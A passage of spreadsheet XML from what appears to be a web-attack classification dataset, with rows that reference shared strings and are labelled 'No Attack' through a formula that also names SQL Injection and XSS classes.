        <v>0</v>
      </c>
      <c r="C27523" s="7" t="str">
        <f t="shared" ref="C27523:C27586" si="430">IF(B27523=0,"No Attack", IF(B27523=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27524" s="1" t="s">
        <v>33969</v>
      </c>
      <c r="B27524">
        <v>0</v>
      </c>
      <c r="C27524" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27525" s="1" t="s">
        <v>30584</v>
      </c>
      <c r="B27525">
        <v>0</v>
      </c>
      <c r="C27525" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27526" s="1" t="s">
        <v>34039</v>
      </c>
      <c r="B27526">
        <v>0</v>
      </c>
      <c r="C27526" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27527" s="1" t="s">
        <v>33064</v>
      </c>
      <c r="B27527">
        <v>0</v>
      </c>
      <c r="C27527" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27528" s="1" t="s">
        <v>36504</v>
      </c>
      <c r="B27528">
        <v>0</v>
      </c>
      <c r="C27528" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27529" s="1" t="s">
        <v>31058</v>
      </c>
      <c r="B27529">
        <v>0</v>
      </c>
      <c r="C27529" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27530" s="1" t="s">
        <v>35671</v>
      </c>
      <c r="B27530">
        <v>0</v>
      </c>
      <c r="C27530" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27531" s="1" t="s">
        <v>28659</v>
      </c>
      <c r="B27531">
        <v>0</v>
      </c>
      <c r="C27531" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27532" s="1" t="s">
        <v>29005</v>
      </c>
      <c r="B27532">
        <v>0</v>
      </c>
      <c r="C27532" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27533" s="1" t="s">
        <v>20155</v>
      </c>
      <c r="B27533">
        <v>0</v>
      </c>
      <c r="C27533" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27534" s="1" t="s">
        <v>22047</v>
      </c>
      <c r="B27534">
        <v>0</v>
      </c>
      <c r="C27534" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27535" s="1" t="s">
        <v>31021</v>
      </c>
      <c r="B27535">
        <v>0</v>
      </c>
      <c r="C27535" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27536" s="1" t="s">
        <v>36310</v>
      </c>
      <c r="B27536">
        <v>0</v>
      </c>
      <c r="C27536" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27537" s="1" t="s">
        <v>27939</v>
      </c>
      <c r="B27537">
        <v>0</v>
      </c>
      <c r="C27537" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27538" s="1" t="s">
        <v>37181</v>
      </c>
      <c r="B27538">
        <v>0</v>
      </c>
      <c r="C27538" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27539" s="1" t="s">
        <v>21664</v>
      </c>
      <c r="B27539">
        <v>0</v>
      </c>
      <c r="C27539" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27540" s="1" t="s">
        <v>31229</v>
      </c>
      <c r="B27540">
        <v>0</v>
      </c>
      <c r="C27540" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27541" s="1" t="s">
        <v>31940</v>
      </c>
      <c r="B27541">
        <v>0</v>
      </c>
      <c r="C27541" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27542" s="1" t="s">
        <v>32285</v>
      </c>
      <c r="B27542">
        <v>0</v>
      </c>
      <c r="C27542" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27543" s="1" t="s">
        <v>22677</v>
      </c>
      <c r="B27543">
        <v>0</v>
      </c>
      <c r="C27543" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27544" s="1" t="s">
        <v>22908</v>
      </c>
      <c r="B27544">
        <v>0</v>
      </c>
      <c r="C27544" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27545" s="1" t="s">
        <v>23967</v>
      </c>
      <c r="B27545">
        <v>0</v>
      </c>
      <c r="C27545" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27546" s="1" t="s">
        <v>23401</v>
      </c>
      <c r="B27546">
        <v>0</v>
      </c>
      <c r="C27546" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27547" s="1" t="s">
        <v>22864</v>
      </c>
      <c r="B27547">
        <v>0</v>
      </c>
      <c r="C27547" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27548" s="1" t="s">
        <v>34717</v>
      </c>
      <c r="B27548">
        <v>0</v>
      </c>
      <c r="C27548" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27549" s="1" t="s">
        <v>30980</v>
      </c>
      <c r="B27549">
        <v>0</v>
      </c>
      <c r="C27549" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27550" s="1" t="s">
        <v>34589</v>
      </c>
      <c r="B27550">
        <v>0</v>
      </c>
      <c r="C27550" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27551" s="1" t="s">
        <v>28971</v>
      </c>
      <c r="B27551">
        <v>0</v>
      </c>
      <c r="C27551" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27552" s="1" t="s">
        <v>20993</v>
      </c>
      <c r="B27552">
        <v>0</v>
      </c>
      <c r="C27552" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27553" s="1" t="s">
        <v>33419</v>
      </c>
      <c r="B27553">
        <v>0</v>
      </c>
      <c r="C27553" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27554" s="1" t="s">
        <v>21935</v>
      </c>
      <c r="B27554">
        <v>0</v>
      </c>
      <c r="C27554" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27555" s="1" t="s">
        <v>36906</v>
      </c>
      <c r="B27555">
        <v>0</v>
      </c>
      <c r="C27555" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27556" s="1" t="s">
        <v>20619</v>
      </c>
      <c r="B27556">
        <v>0</v>
      </c>
      <c r="C27556" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27557" s="1" t="s">
        <v>28260</v>
      </c>
      <c r="B27557">
        <v>0</v>
      </c>
      <c r="C27557" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27558" s="1" t="s">
        <v>34930</v>
      </c>
      <c r="B27558">
        <v>0</v>
      </c>
      <c r="C27558" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27559" s="1" t="s">
        <v>36563</v>
      </c>
      <c r="B27559">
        <v>0</v>
      </c>
      <c r="C27559" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27560" s="1" t="s">
        <v>35013</v>
      </c>
      <c r="B27560">
        <v>0</v>
      </c>
      <c r="C27560" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27561" s="1" t="s">
        <v>30804</v>
      </c>
      <c r="B27561">
        <v>0</v>
      </c>
      <c r="C27561" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27562" s="1" t="s">
        <v>37307</v>
      </c>
      <c r="B27562">
        <v>0</v>
      </c>
      <c r="C27562" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27563" s="1" t="s">
        <v>20477</v>
      </c>
      <c r="B27563">
        <v>0</v>
      </c>
      <c r="C27563" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27564" s="1" t="s">
        <v>22825</v>
      </c>
      <c r="B27564">
        <v>0</v>
      </c>
      <c r="C27564" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27565" s="1" t="s">
        <v>29767</v>
      </c>
      <c r="B27565">
        <v>0</v>
      </c>
      <c r="C27565" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27566" s="1" t="s">
        <v>29625</v>
      </c>
      <c r="B27566">
        <v>0</v>
      </c>
      <c r="C27566" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27567" s="1" t="s">
        <v>28114</v>
      </c>
      <c r="B27567">
        <v>0</v>
      </c>
      <c r="C27567" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27568" s="1" t="s">
        <v>31387</v>
      </c>
      <c r="B27568">
        <v>0</v>
      </c>
      <c r="C27568" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27569" s="1" t="s">
        <v>33174</v>
      </c>
      <c r="B27569">
        <v>0</v>
      </c>
      <c r="C27569" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27570" s="1" t="s">
        <v>22916</v>
      </c>
      <c r="B27570">
        <v>0</v>
      </c>
      <c r="C27570" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27571" s="1" t="s">
        <v>26820</v>
      </c>
      <c r="B27571">
        <v>0</v>
      </c>
      <c r="C27571" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27572" s="1" t="s">
        <v>27975</v>
      </c>
      <c r="B27572">
        <v>0</v>
      </c>
      <c r="C27572" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27573" s="1" t="s">
        <v>31172</v>
      </c>
      <c r="B27573">
        <v>0</v>
      </c>
      <c r="C27573" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27574" s="1" t="s">
        <v>20230</v>
      </c>
      <c r="B27574">
        <v>0</v>
      </c>
      <c r="C27574" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27575" s="1" t="s">
        <v>33007</v>
      </c>
      <c r="B27575">
        <v>0</v>
      </c>
      <c r="C27575" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27576" s="1" t="s">
        <v>10212</v>
      </c>
      <c r="B27576">
        <v>0</v>
      </c>
      <c r="C27576" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27577" s="1" t="s">
        <v>34221</v>
      </c>
      <c r="B27577">
        <v>0</v>
      </c>
      <c r="C27577" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27578" s="1" t="s">
        <v>30779</v>
      </c>
      <c r="B27578">
        <v>0</v>
      </c>
      <c r="C27578" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27579" s="1" t="s">
        <v>31160</v>
      </c>
      <c r="B27579">
        <v>0</v>
      </c>
      <c r="C27579" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27580" s="1" t="s">
        <v>32211</v>
      </c>
      <c r="B27580">
        <v>0</v>
      </c>
      <c r="C27580" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27581" s="1" t="s">
        <v>34193</v>
      </c>
      <c r="B27581">
        <v>0</v>
      </c>
      <c r="C27581" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27582" s="1" t="s">
        <v>10213</v>
      </c>
      <c r="B27582">
        <v>0</v>
      </c>
      <c r="C27582" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27583" s="1" t="s">
        <v>33199</v>
      </c>
      <c r="B27583">
        <v>0</v>
      </c>
      <c r="C27583" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27584" s="1" t="s">
        <v>22945</v>
      </c>
      <c r="B27584">
        <v>0</v>
      </c>
      <c r="C27584" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27585" s="1" t="s">
        <v>21838</v>
      </c>
      <c r="B27585">
        <v>0</v>
      </c>
      <c r="C27585" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27586" s="1" t="s">
        <v>35031</v>
      </c>
      <c r="B27586">
        <v>0</v>
      </c>
      <c r="C27586" s="7" t="str">
        <f t="shared" si="430"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27587" s="1" t="s">
        <v>28233</v>
      </c>
      <c r="B27587">
        <v>0</v>
      </c>
      <c r="C27587" s="7" t="str">
        <f t="shared" ref="C27587:C27650" si="431">IF(B27587=0,"No Attack", IF(B27587=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27588" s="1" t="s">
        <v>27347</v>
      </c>
      <c r="B27588">
        <v>0</v>
      </c>
      <c r="C27588" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27589" s="1" t="s">
        <v>9861</v>
      </c>
      <c r="B27589">
        <v>0</v>
      </c>
      <c r="C27589" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27590" s="1" t="s">
        <v>20438</v>
      </c>
      <c r="B27590">
        <v>0</v>
      </c>
      <c r="C27590" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27591" s="1" t="s">
        <v>27859</v>
      </c>
      <c r="B27591">
        <v>0</v>
      </c>
      <c r="C27591" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27592" s="1" t="s">
        <v>29856</v>
      </c>
      <c r="B27592">
        <v>0</v>
      </c>
      <c r="C27592" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27593" s="1" t="s">
        <v>37206</v>
      </c>
      <c r="B27593">
        <v>0</v>
      </c>
      <c r="C27593" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27594" s="1" t="s">
        <v>33613</v>
      </c>
      <c r="B27594">
        <v>0</v>
      </c>
      <c r="C27594" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27595" s="1" t="s">
        <v>35379</v>
      </c>
      <c r="B27595">
        <v>0</v>
      </c>
      <c r="C27595" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27596" s="1" t="s">
        <v>33663</v>
      </c>
      <c r="B27596">
        <v>0</v>
      </c>
      <c r="C27596" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27597" s="1" t="s">
        <v>20234</v>
      </c>
      <c r="B27597">
        <v>0</v>
      </c>
      <c r="C27597" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27598" s="1" t="s">
        <v>33233</v>
      </c>
      <c r="B27598">
        <v>0</v>
      </c>
      <c r="C27598" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27599" s="1" t="s">
        <v>36799</v>
      </c>
      <c r="B27599">
        <v>0</v>
      </c>
      <c r="C27599" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27600" s="1" t="s">
        <v>20636</v>
      </c>
      <c r="B27600">
        <v>0</v>
      </c>
      <c r="C27600" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27601" s="1" t="s">
        <v>36328</v>
      </c>
      <c r="B27601">
        <v>0</v>
      </c>
      <c r="C27601" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27602" s="1" t="s">
        <v>30029</v>
      </c>
      <c r="B27602">
        <v>0</v>
      </c>
      <c r="C27602" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27603" s="1" t="s">
        <v>34156</v>
      </c>
      <c r="B27603">
        <v>0</v>
      </c>
      <c r="C27603" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27604" s="1" t="s">
        <v>33937</v>
      </c>
      <c r="B27604">
        <v>0</v>
      </c>
      <c r="C27604" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27605" s="1" t="s">
        <v>33151</v>
      </c>
      <c r="B27605">
        <v>0</v>
      </c>
      <c r="C27605" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27606" s="1" t="s">
        <v>36701</v>
      </c>
      <c r="B27606">
        <v>0</v>
      </c>
      <c r="C27606" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27607" s="1" t="s">
        <v>31411</v>
      </c>
      <c r="B27607">
        <v>0</v>
      </c>
      <c r="C27607" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27608" s="1" t="s">
        <v>32697</v>
      </c>
      <c r="B27608">
        <v>0</v>
      </c>
      <c r="C27608" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27609" s="1" t="s">
        <v>36567</v>
      </c>
      <c r="B27609">
        <v>0</v>
      </c>
      <c r="C27609" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27610" s="1" t="s">
        <v>28097</v>
      </c>
      <c r="B27610">
        <v>0</v>
      </c>
      <c r="C27610" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27611" s="1" t="s">
        <v>32544</v>
      </c>
      <c r="B27611">
        <v>0</v>
      </c>
      <c r="C27611" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27612" s="1" t="s">
        <v>20334</v>
      </c>
      <c r="B27612">
        <v>0</v>
      </c>
      <c r="C27612" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27613" s="1" t="s">
        <v>22413</v>
      </c>
      <c r="B27613">
        <v>0</v>
      </c>
      <c r="C27613" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27614" s="1" t="s">
        <v>36556</v>
      </c>
      <c r="B27614">
        <v>0</v>
      </c>
      <c r="C27614" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27615" s="1" t="s">
        <v>21189</v>
      </c>
      <c r="B27615">
        <v>0</v>
      </c>
      <c r="C27615" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27616" s="1" t="s">
        <v>36024</v>
      </c>
      <c r="B27616">
        <v>0</v>
      </c>
      <c r="C27616" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27617" s="1" t="s">
        <v>21159</v>
      </c>
      <c r="B27617">
        <v>0</v>
      </c>
      <c r="C27617" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27618" s="1" t="s">
        <v>22609</v>
      </c>
      <c r="B27618">
        <v>0</v>
      </c>
      <c r="C27618" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27619" s="1" t="s">
        <v>20600</v>
      </c>
      <c r="B27619">
        <v>0</v>
      </c>
      <c r="C27619" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27620" s="1" t="s">
        <v>33124</v>
      </c>
      <c r="B27620">
        <v>0</v>
      </c>
      <c r="C27620" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27621" s="1" t="s">
        <v>36709</v>
      </c>
      <c r="B27621">
        <v>0</v>
      </c>
      <c r="C27621" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27622" s="1" t="s">
        <v>30130</v>
      </c>
      <c r="B27622">
        <v>0</v>
      </c>
      <c r="C27622" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27623" s="1" t="s">
        <v>29256</v>
      </c>
      <c r="B27623">
        <v>0</v>
      </c>
      <c r="C27623" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27624" s="1" t="s">
        <v>23268</v>
      </c>
      <c r="B27624">
        <v>0</v>
      </c>
      <c r="C27624" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27625" s="1" t="s">
        <v>30491</v>
      </c>
      <c r="B27625">
        <v>0</v>
      </c>
      <c r="C27625" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27626" s="1" t="s">
        <v>37474</v>
      </c>
      <c r="B27626">
        <v>0</v>
      </c>
      <c r="C27626" s="7" t="str">
        <f t="shared" si="431"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="27627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27627" s="1" t="s">
        <v>34693</v>
      </c>
      <c r="B27627">
        <v>0</v>
      </c>
